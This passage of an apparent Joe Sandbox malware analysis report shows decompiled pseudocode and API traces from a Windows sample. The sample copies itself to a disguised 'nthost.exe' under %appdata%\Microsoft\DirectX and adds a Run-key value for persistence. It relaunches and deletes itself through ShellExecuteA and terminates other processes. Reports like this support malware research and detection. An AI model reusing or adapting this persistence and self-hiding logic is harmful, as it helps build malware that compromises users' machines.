					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
